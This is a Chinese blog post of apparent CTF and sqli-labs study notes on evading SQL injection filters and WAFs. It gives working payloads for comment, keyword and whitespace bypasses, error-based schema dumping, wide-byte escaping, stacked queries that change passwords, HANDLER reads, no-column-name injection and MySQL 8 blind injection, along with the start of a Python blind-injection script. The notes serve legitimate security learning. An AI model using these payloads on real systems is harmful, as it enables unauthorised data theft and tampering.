<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"flat"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="过滤绕过 过滤原理经过前段时间的学习,已经可以通过一些方法去查询想要的数据,但一些网站会对一些关键字符进行过滤,也就是说输入进去的字符没法正常的进入到查询语句里.例如preg_replace(参数1,参数2,参数3)函数,会将参数三进行检测,如果发现参数1,则替换为参数2,而对关键字符进行替换删除  绕过原理将被绕过的字符换成另一种表达方式,从而实现绕过过滤  如何判断页面过滤对象从简单的注入语句">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入2.0">
<meta property="og:url" content="http://example.com/2023/03/31/SQL%E6%B3%A8%E5%85%A52-0/index.html">
<meta property="og:site_name" content="睡猫的博客">
<meta property="og:description" content="过滤绕过 过滤原理经过前段时间的学习,已经可以通过一些方法去查询想要的数据,但一些网站会对一些关键字符进行过滤,也就是说输入进去的字符没法正常的进入到查询语句里.例如preg_replace(参数1,参数2,参数3)函数,会将参数三进行检测,如果发现参数1,则替换为参数2,而对关键字符进行替换删除  绕过原理将被绕过的字符换成另一种表达方式,从而实现绕过过滤  如何判断页面过滤对象从简单的注入语句">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230331163940.png">
<meta property="og:image" content="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230413180315.png">
<meta property="og:image" content="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230402222253.png">
<meta property="article:published_time" content="2023-03-31T06:56:19.000Z">
<meta property="article:modified_time" content="2023-05-30T03:44:58.031Z">
<meta property="article:author" content="？？喵！！">
<meta property="article:tag" content="SQL">
<meta property="article:tag" content="sqli-labs">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230331163940.png">

<link rel="canonical" href="http://example.com/2023/03/31/SQL%E6%B3%A8%E5%85%A52-0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>SQL注入2.0 | 睡猫的博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">睡猫的博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">分享代码，记录生活</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/03/31/SQL%E6%B3%A8%E5%85%A52-0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/hearder.jpg">
      <meta itemprop="name" content="？？喵！！">
      <meta itemprop="description" content="瞄一下学过代码，写一个睡喵的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="睡猫的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQL注入2.0
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-03-31 14:56:19" itemprop="dateCreated datePublished" datetime="2023-03-31T14:56:19+08:00">2023-03-31</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-05-30 11:44:58" itemprop="dateModified" datetime="2023-05-30T11:44:58+08:00">2023-05-30</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>7.7k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>27 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="过滤绕过"><a href="#过滤绕过" class="headerlink" title="过滤绕过"></a>过滤绕过</h1><ol start="0">
<li><p><strong>过滤原理</strong><br>经过前段时间的学习,已经可以通过一些方法去查询想要的数据,但一些网站会对一些关键字符进行过滤,也就是说输入进去的字符没法正常的进入到查询语句里.例如<code>preg_replace(参数1,参数2,参数3)</code>函数,会将参数三进行检测,如果发现参数1,则替换为参数2,而对关键字符进行替换删除</p>
</li>
<li><p><strong>绕过原理</strong><br>将被绕过的字符换成另一种表达方式,从而实现绕过过滤</p>
</li>
<li><p><strong>如何判断页面过滤对象</strong><br>从简单的注入语句开始,一步步增加复杂性,通过此方法判断过滤对象</p>
</li>
</ol>
<h2 id="注释符绕过"><a href="#注释符绕过" class="headerlink" title="注释符绕过"></a>注释符绕过</h2><ol start="0">
<li><p><strong>常见的注释</strong><br><code>--+</code> <code>#</code> <code>%23</code>建议先尝试这三种,都失效了再尝试其他<br>url里好像不能直接用<code>#</code>,要使用<code>%23</code></p>
</li>
<li><p><strong>绕过手法</strong><br><code>,&#39;3</code>最后一个单引号实现闭合,<code>3</code>可以换成任意数字,这种适用于union查询<br>可以将查询写成这样的形式<br><code>union select 1,(查询语句),3,4&#39;</code><br>这样一来最后的数字可以带一个单引号实现闭合</p>
<p>注释符失效的情况下,可以参考注入编码的方式,用类似于<code>and &#39;1&#39; =&#39;1</code>(或者<code>or &#39;1&#39;=&#39;1</code>)这样的语句对后面的内容实现闭合<br>注意:这种方式闭合可能导致<code>order by</code>,<code>group by</code>失效,原因暂时未知</p>
</li>
</ol>
<h2 id="and和or绕过"><a href="#and和or绕过" class="headerlink" title="and和or绕过"></a>and和or绕过</h2><ol>
<li><strong>绕过手法</strong><ol>
<li>使用大小写绕过<br>因为SQL语句不区分大小写,可以故意写错成类似于<code>AnD,anD,oR</code>这样的形式来绕过过滤检测</li>
<li>复写过滤字符<br>如果过滤的方式是检测到关键字符就删除,可以采用复写的方式绕过<code>anandd</code>,将关键词删除后又成为了关键词</li>
<li>用符号代替<br>可以用<code>&amp;&amp;</code>代替<code>and</code>,用<code>||</code>代替<code>or</code>,但是用get提交可能会失效,要使用URL编码(<code>%26=$</code>)(<code>%7C=|</code>)</li>
<li>注意<br>如果语句过滤了and和or,单词里的也会收到影响(复写一下),如inf<strong>or</strong>mation</li>
</ol>
</li>
</ol>
<h2 id="等于号绕过"><a href="#等于号绕过" class="headerlink" title="等于号绕过"></a>等于号绕过</h2><ol>
<li>等于号被过滤了可以采用<code>like</code>进行绕过,如果空格也被过滤了,可以在两边加上扩号</li>
</ol>
<h2 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h2><ol>
<li>使用<code>+</code>,<code>%20</code>号代替空格</li>
<li>使用URL编码绕过空格<br> <code>\**\</code> <code>%09</code>  <code>%0A</code>  <code>%0B</code>  <code>%0C</code>  <code>%0D</code>  <code>%A0</code><br> <img src="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230331163940.png"></li>
<li>使用报错注入<br>原因:报错注入语法里没有空格,查询语句中的空格全部用<strong>括号</strong>代替<br><code>and 1=extractvalue(100,concat(0x7e,(插入以下语句)))</code><br>查表名:<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span>(group_concat(table_name))<span class="keyword">from</span>(information_schema.tables)<span class="keyword">where</span>(table_schema<span class="operator">=</span>database())</span><br></pre></td></tr></table></figure>
查列名:<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span>(group_concat(column_name))<span class="keyword">from</span>(information_schema.columns)<span class="keyword">where</span>(table_schema<span class="operator">=</span>database())<span class="keyword">and</span>(table_name<span class="operator">=</span><span class="string">&#x27;上一步爆破出来的表名&#x27;</span>)</span><br></pre></td></tr></table></figure>
查数据:<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span>(group_concat(爆破字段<span class="number">1</span>,爆破字段<span class="number">2</span>))<span class="keyword">from</span>(爆破出来的表名)</span><br></pre></td></tr></table></figure>

显示不全用下面这个<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span>(<span class="built_in">substring</span>(group_concat(爆破字段<span class="number">1</span>,爆破字段<span class="number">2</span>),<span class="number">1</span>,<span class="number">30</span>))<span class="keyword">from</span>(爆破出的表名)</span><br></pre></td></tr></table></figure></li>
<li>注意:sqli-libs第26关同时过滤了<strong>注释符</strong>,<strong>and和or</strong>,<strong>空格</strong>,要结合以上方法来做</li>
</ol>
<h2 id="substring过滤"><a href="#substring过滤" class="headerlink" title="substring过滤"></a>substring过滤</h2><ol>
<li><code>right(字段,位数)</code>从位数开始向右显示<br><code>left(字段,位数)</code>从位数开始向左显示<br>例:<code>select (right(爆破字段1,30)) from (爆破出的表名)</code><br>从第三十个开始向左显示</li>
</ol>
<h2 id="union和select过滤"><a href="#union和select过滤" class="headerlink" title="union和select过滤"></a>union和select过滤</h2><p>其实思路和<strong>and和or</strong>过滤差不多,利用大小写组合,复写,等方式绕过</p>
<h2 id="逗号过滤Join绕过"><a href="#逗号过滤Join绕过" class="headerlink" title="逗号过滤Join绕过"></a>逗号过滤Join绕过</h2><p>一般用到逗号的地方只有<code>union select 1,2,3</code>(列数必须一致),还有<code>select group_concat(爆破字段1,爆破字段2) from 爆破出来的表名</code></p>
<ol>
<li>爆破字段可以分开查询</li>
<li>union列数必须保持一致,这时候利用join<br><code>union select 1,2,3</code>&#x3D;<code>union select * from (select 1)a join (select 2)b join (select 3)c</code><br>注意:a,b,c是取得别名,将查询语句写入括号内,用jion关联</li>
</ol>
<h2 id="char-函数"><a href="#char-函数" class="headerlink" title="char()函数"></a>char()函数</h2><p>可以将函数内的十进制数字转化为ascii编码对应字符<br>如char(117,115,101,114,115)&#x3D;’users’<br>在爆破字段名时可以绕过引号</p>
<h2 id="addslashes过滤宽字节绕过"><a href="#addslashes过滤宽字节绕过" class="headerlink" title="addslashes过滤宽字节绕过"></a>addslashes过滤宽字节绕过</h2><ol>
<li><code>adddslashes()</code>函数<br>可以在输入的预定义字符(单引号<code>&#39;</code>  双引号<code>&quot;</code>  反斜线<code>\</code>  <code>NULL</code>字符)前自动添加转义字符<code>\</code>,这样一来,注入语句中的符号就会被转义成这个字符本身,无法构成闭合</li>
<li><strong>条件</strong>:<br>想要使用宽字节绕过,必须采用的是GBK编码</li>
<li><strong>原理</strong>:<br>在预定义字符前加上<code>%df</code>,这样一来<code>%df</code>会和自动添加的<code>\</code>组合,被识别成SQL无法理解的汉字,从而使<code>\</code>失去转义功能</li>
<li><strong>使用汉字</strong><br>有些汉字是三个字节的编码,代替<code>%df</code>时,可以前两个字节为一组,后两个字节为一组,从而过滤掉反斜杆,例如<code>汉&#39; or 1=1 #</code></li>
</ol>
<h2 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h2><ol>
<li><strong>原理</strong><br>在一些情况下,使用了addslashes()等函数对用户输入的特殊字符进行了转义,但是对于这些数据,在写入到数据库时,还是保留了原来的数据,在保存到数据库的数据,就被认为是可信的,再下一次需要查询时,没有再次进行检验,就会造成二次注入.<br>大多出现在一些需要注册和登入的情况下</li>
<li><strong>流程</strong><ol>
<li>需要构造含有转义字符的恶意查询语句</li>
<li>需有一处可以进行恶意数据的插入(比如注册)</li>
<li>需要另一处引用了这个数据的操作(比如登入)<br><img src="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230413180315.png"></li>
</ol>
</li>
</ol>
<h2 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h2><ol>
<li><p><strong>原理</strong><br><code>mysql_multi_query()</code>函数执行一个或多个数据库的查询,其中用逗号进行分割.如果代码中用到这个函数,很有可能产生堆叠注入,所谓的堆叠注入,其实就是一堆sql语句一起注入执行,这对安全的危害是十分巨大的,如果产生堆叠注入,用户可能可以通过语句对数据的数据进行修改,增加,甚至删除</p>
</li>
<li><p>写法<code>id = 1&#39;;update users set password=123 where id=1;</code><br>查询id&#x3D;1的数据,并将users表里的id&#x3D;1的用户密码修改成123,引号是为了将前面的数据闭合</p>
</li>
<li><p><strong>用处</strong><br>一般<code>select</code>被过滤的情况下,常规注入全都无可奈何了,这时候可以尝试堆叠注入,堆叠注入可以利用其他命令来达成获取数据</p>
<ol>
<li><p><strong>使用show查 库名,表名,字段名</strong><br> 爆数据库名:<code>show databases</code><br> 爆表名<code>show tables</code><br> 爆字段名<code>show columns from 表名</code> </p>
</li>
<li><p><strong>使用16进制编码绕过</strong><br> 先看payload<br> <code>1&#39;;SET@a=十六进制编码后的命令;prepare execsql from @a;execute execsql;#</code><br> 解释<br> <code>set@a</code>是设置一个变量a储存编码后的命令(如<code>select * from 表名</code>)<br> <code>prepare execsql from @a</code>是预处理语句,会将a进行编码转化,储存在execsql中<br> <code>execute execsql</code> EXECUTE语句是SQL中的一个语句，它用于执行Transact-SQL批处理中的命令字符串<br> 转化16进制的<a target="_blank" rel="noopener" href="http://www.hiencode.com/hex.html">网站</a>（记得前面加个0x）<br> 或者用python脚本跑一下</p>
 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">string_to_hex</span>(<span class="params">s</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>.join([<span class="built_in">hex</span>(<span class="built_in">ord</span>(c)).replace(<span class="string">&#x27;0x&#x27;</span>, <span class="string">&#x27;&#x27;</span>) <span class="keyword">for</span> c <span class="keyword">in</span> s])</span><br><span class="line"></span><br><span class="line">input_string =<span class="string">&quot;select * from `1919810931114514`&quot;</span></span><br><span class="line">hex_string = string_to_hex(input_string)</span><br><span class="line"><span class="built_in">print</span>( <span class="string">&quot;0x&quot;</span>+hex_string)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>handler处理程序</strong></p>
 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">HANDLER是MySQL中的一个语句，它提供了对表存储引擎接口的直接访问。它可用于InnoDB和MyISAM表。HANDLER语句有多种形式，包括HANDLER ... OPEN、HANDLER ... READ和HANDLER ... CLOSE等。</span><br><span class="line"></span><br><span class="line">HANDLER ... OPEN语句用于打开一个表，使其能够使用后续的HANDLER ... READ语句进行访问。这个表对象不会被其他会话共享，并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭。</span><br><span class="line"></span><br><span class="line">HANDLER ... READ语句用于从表中读取数据。它有多种形式，可以根据索引、索引顺序或自然行顺序来读取数据。</span><br><span class="line"></span><br><span class="line">HANDLER ... CLOSE语句用于关闭使用HANDLER ... OPEN打开的表。</span><br></pre></td></tr></table></figure>
<p> 看一下<strong>payload</strong>(<code>as a</code>是取别名):</p>
 <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">&#x27;; handler `表名` open as `a`; handler `a` read next;#</span></span><br></pre></td></tr></table></figure></li>
</ol>
</li>
</ol>
<h1 id="waf绕过"><a href="#waf绕过" class="headerlink" title="waf绕过"></a>waf绕过</h1><p>在已经确定有waf(防火墙)的情况下,不要一步输入所有指令,而是一步步添加,发现哪个指令被拦截,就绕过哪个指令<br>一般有以下几种情况</p>
<ol>
<li>某个特殊字符后面不能接一些字符,否则报错</li>
<li>几个特殊字符后面不能接一些字符,否则报错</li>
<li>不能出现一些特殊字符,否则报错</li>
</ol>
<h2 id="注释"><a href="#注释" class="headerlink" title="注释"></a>注释</h2><ol start="0">
<li><strong>原理</strong>:<br>某个特殊字符后面不能接一些字符,否则报错,如<code>select</code>和<code>union</code>,这两个放在一起会被过滤,这时候在中间插入注释符混淆,如<code>/*!90000 */</code>,让防火墙误以为里面内容也是要执行,实际上在mysql里会被注释,从而实现绕过</li>
<li><code>--+</code>,<code>#</code></li>
<li><code>/*  */</code><br>在sql里,<code>/* */</code>里的内容将会被注释,不做执行</li>
<li><code>/*! */</code><br>这是mysql的扩张解释,如果在前面的星号后面加上感叹号<code>!</code>,那么注释里的内容又会被执行</li>
<li><code>/*!50000 */</code><br>表示mysql是5.00.00以上的版本时,注释符里的内容才会被执行,可以将感叹号后面的数字改成一个很大的不存在的版本,这样注释里的语句就不会执行</li>
</ol>
<h2 id="空白符"><a href="#空白符" class="headerlink" title="空白符"></a>空白符</h2><p>原理:在关键字符中插入,一个注释符后面加上一个任意字符和换行符,如<code>select --+a%0A union</code>让防火墙误以为select后面是字符a,实际上a被注释后换行,union不受影响</p>
<h2 id="and和or替换"><a href="#and和or替换" class="headerlink" title="and和or替换"></a>and和or替换</h2><ol>
<li><code>&amp;&amp;</code>和<code>||</code>进行替换</li>
<li>使用异或<br> 简单来说异或就是同真同假为0,不同为1<br> <code>?id=1^1^0</code>  可以替换<code>?id=1 and 1=2</code>的功能<br> <code>?id=1^1^1</code>  可以替换<code>?id=1 and 1=1</code>的功能<br> 注意,布尔盲注也可以用异或来代替and,在<code>if()</code>被禁用时,似乎是个不错的选择(闭合为整数型)<br> <code>?id=1^1^(ascii(substr((select(database())),1,1))&gt;100)</code></li>
<li>使用真假判断<br> <code>?id=1 &amp;&amp; ture</code>   如果过滤了and后面接数字的情况,可以替换<code>?id=1 and 1=1</code>的功能<br> <code>?id=1 &amp;&amp; false</code>   如果过滤了and后面接数字的情况,可以替换<code>?id=1 and 1=2</code>的功能</li>
</ol>
<h2 id="group-by替换order-by"><a href="#group-by替换order-by" class="headerlink" title="group by替换order by"></a>group by替换order by</h2><p><code>order by</code>在很多情况下更好用,但是相对防火墙的限制也更严格</p>
<h2 id="information-schema-tables替换"><a href="#information-schema-tables替换" class="headerlink" title="information_schema.tables替换"></a>information_schema.tables替换</h2><p>如果 <code>information_schema</code>被过滤了的话,里面有两个关键数据表就无法读取<code>tables</code>和<code>columns</code></p>
<ol>
<li><p><code>table_schema</code>不变<br> <code>sys.schema_table_statistics_with_buffer</code><br> <code>sys.x$ps_schema_table_statistics_io</code></p>
</li>
<li><p><code>table_schema</code>替换成<code>database_name</code><br> <code>mysql.innodb_table_stats</code>  <code>mysql.innodb_table_index</code></p>
</li>
</ol>
<h2 id="join法获取列名-information-schema-columns替换"><a href="#join法获取列名-information-schema-columns替换" class="headerlink" title="join法获取列名(information_schema.columns替换)"></a>join法获取列名(information_schema.columns替换)</h2><ol>
<li><strong>前提</strong>:页面必须存在报错回显</li>
<li><strong>语法</strong><br><code>union select * from(select*from 爆出的表名 as a join 同一个表名 as b)c</code><br>这时候会显示出第一个表名,使用<code>using()</code>函数逐渐加入爆出来的字段,获得下一个字段<br><code>union select * from(select*from 爆出的表名 as a join 同一个表名 as b using(第一个列名,第二个列名...))c</code></li>
</ol>
<h2 id="无列名注入"><a href="#无列名注入" class="headerlink" title="无列名注入"></a>无列名注入</h2><ol>
<li><strong>获取数据</strong><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> group_concat(b) <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">as</span> b <span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> 爆破出的表名)k),<span class="number">3</span></span><br></pre></td></tr></table></figure></li>
<li><strong>原理</strong><br>和之前的密码绕过一样,这里利用到的是union查询时会将两张表中的数据合并<strong>创建虚拟表</strong>的特性<br><code>select 1,2,3 as b union select * from 爆破出的表名</code><br>这句话的作用就是创建一个如下的虚拟表<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">+----+--------+---------+</span><br><span class="line">| 1  | 2      | 3别名(b)|</span><br><span class="line">+----+--------+---------+</span><br><span class="line">|  1 | 2      | 3       |</span><br><span class="line">|  1 | zzzz   | mmmm    |</span><br><span class="line">|  2 | admin  | admin   |</span><br><span class="line">|  3 | admin1 | admin1  |</span><br><span class="line">+----+--------+---------+</span><br><span class="line">可以发现这样一来已经不需要知道原来的表名了,只需要把这个当做新表查询即可</span><br></pre></td></tr></table></figure>
因为是新创建的表写在前面,原来的表写在后面,如果反过来,是不是就是在原来的表中增加数据了呢,就可以实现密码绕过了</li>
<li><strong>注意</strong><br><code>select 1,2,3 as b</code>需要逐步尝试列数,as是取别名,最后用取的别名来代替原来的名称</li>
</ol>
<h2 id="mysql-8-0-select绕过"><a href="#mysql-8-0-select绕过" class="headerlink" title="mysql 8.0+ select绕过"></a>mysql 8.0+ select绕过</h2><ol>
<li><p><strong>适用于什么情况</strong><br>如果select关键词被完全过滤,且不存在堆叠注入的情况下,一般情况下是无法进行SQL注入的<br>但是<code>mysql 8.0.19</code>的版本增加了一些新特性,可以利用这些新语法在不使用select的情况下也能进行查询</p>
</li>
<li><p><strong>TABLE</strong><br><code>table</code>列出表的所有内容，类似于SELECT,支持UNION联合查询、ORDER BY排序、LIMIT子句限制产生的行数。<br><code>TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]</code><br>需要注意的是 1. table始终显示表的所有列(<code>table user</code>&#x3D;<code>select * from user</code>) 2. 不允许有WHERE子句</p>
</li>
<li><p><strong>VALUES</strong><br><code>VALUES</code>列出一行的值。<br><code>ROW()</code>返回的是一个行数据，VALUES和ROW()配合使用,返回的行数据加上字段整理为一个表<br>我们可以利用这个特性用values来判断当前语句表列数以及是否有回显<br><code>union values row(1,2,3,...)#</code><br>如果原表中的列数与<code>row()</code>中的数字数不同时,就会报错</p>
</li>
<li><p><strong>盲注</strong><br>由上面的知识可以知道,table查询的表代表的是所有列,如果要使用table进行union联合查询的话,必须要table查询的表和原来语句中的表的列数是相同的,不能像select联合查询那么自由,所以很多时候,我们只能用盲注来获取想要的数据<br>学到的一种新的无列名盲注<br><code> or (1,&#39;Tom&#39;,&#39;123&#39;) &lt;= (table user limit 0,1)#</code><br>实质上这个语句是<code>table user limit 0,1</code>查询user表中的第一行,与另一个我们自己列出的数据进行大于等于<code>&lt;=</code>的比较，比较顺序为自左向右(一个字符一个字符比较)，第一列(也就是第一个引号内的数据<code>&#39;Tom&#39;</code>)判断正确再判断第二列(也就是第二个引号内<code>&#39;123&#39;</code>)。<br><strong>ps:当然这个例子中实际上的第一列应该是id,整数型的1,一般情况下都是如此</strong><br>采用这种方式进行比较盲注的话,列数就可以由自己控制了,我们只需要一个字符一个字符,一列一列的慢慢进行比较即可盲注出结果(前提是可以盲注)<br>给个python脚本,虽然写的比较烂,这个是POST脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&#x27;网址&#x27;</span></span><br><span class="line">table = <span class="string">&quot;&quot;</span>  <span class="comment"># 储存数据</span></span><br><span class="line">flag=<span class="string">&#x27;&#x27;</span> <span class="comment">#真值条件</span></span><br><span class="line">left = <span class="number">0</span></span><br><span class="line">right = <span class="number">150</span></span><br><span class="line">mid = (left + right) // <span class="number">2</span></span><br><span class="line"><span class="keyword">while</span> (left &lt; right):</span><br><span class="line">    a=<span class="built_in">chr</span>(mid)</span><br><span class="line">    date = &#123;</span><br><span class="line">        <span class="string">&quot;password&quot;</span>: <span class="string">&quot;admin&quot;</span>,</span><br><span class="line">        <span class="comment"># 